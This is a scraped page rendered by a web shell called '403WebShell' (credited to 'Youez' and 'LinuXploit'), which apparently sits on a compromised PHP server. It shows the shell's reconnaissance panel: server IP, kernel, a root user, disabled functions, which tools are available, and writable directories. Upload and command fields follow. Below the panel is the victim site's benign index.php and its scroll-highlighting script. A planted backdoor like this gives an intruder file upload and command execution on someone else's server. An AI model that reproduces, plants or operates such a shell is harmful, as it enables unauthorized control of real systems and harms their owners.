Warning: chmod(): Operation not permitted in /data/html/improve/wp-content/plugins/wordfence/wordfence.php on line 8
403WebShell
403Webshell
Server IP : 52.9.100.119  /  Your IP : 216.73.216.135
Web Server : Apache/2.4.61 (Amazon) OpenSSL/1.0.2k-fips PHP/7.3.30 Phusion_Passenger/5.1.5
System : Linux ip-172-31-9-35 4.14.355-196.618.amzn1.x86_64 #1 SMP Mon Apr 7 17:09:50 UTC 2025 x86_64
User : root ( 0)
PHP Version : 7.3.30
Disable Function : exec,passthru,shell_exec,system,popen,proc_open
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /data/html/guaycan_live/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /data/html/guaycan_live/index.php
<?php 
    require 'header.php'; 
    require 'intro.php';
    require 'nosotros.php';
    require 'proteccion.php';
    require 'productos.php';
    require 'logos.php';
    require 'proyectos.php';
    require 'trabajo.php';
    require 'footer.php';
?>  
<script>
    $(document).ready(function(){
        active();
        window.onscroll = () => {
            if(window.scrollY <= 10){
                const nav = document.querySelector('#navbar');
                nav.className = '';
            }
            else{
                const nav = document.querySelector('#navbar');
                nav.className = 'scroll';
            }
        
            active();
        }

        function active(){
            var windowHeight = window.scrollY;

            var nosotros = document.querySelector('#nosotros').offsetTop - 1;
            var productos = document.querySelector('#productos').offsetTop - 1;
            var proyectos = document.querySelector('#proyectos').offsetTop - 1;
            var contacto = document.querySelector('#contacto').offsetTop - 1;

            if(windowHeight >= nosotros && windowHeight < productos){
                const option = document.querySelector('#linkNosotros');
                option.className = 'nav-item active';
            }else{
                const option = document.querySelector('#linkNosotros');
                option.className = 'nav-item';
            }


            if(windowHeight >= productos && windowHeight < proyectos){
                const option = document.querySelector('#linkProductos');
                option.className = 'nav-item active';
            }else{
                const option = document.querySelector('#linkProductos');
                option.className = 'nav-item';
            }


            if(windowHeight >= proyectos && windowHeight < contacto && $(window).scrollTop() + $(window).height() != $(document).height()){
                const option = document.querySelector('#linkProyectos');
                option.className = 'nav-item active';
            }else{
                const option = document.querySelector('#linkProyectos');
                option.className = 'nav-item';
            }

            if(windowHeight >= contacto || $(window).scrollTop() + $(window).height() == $(document).height()){
                const option = document.querySelector('#linkContacto');
                option.className = 'nav-item active';
            }else{
                const option = document.querySelector('#linkContacto');
                option.className = 'nav-item';
            }
        }
    });
</script> 

Youez - 2016 - github.com/yon3zu
LinuXploit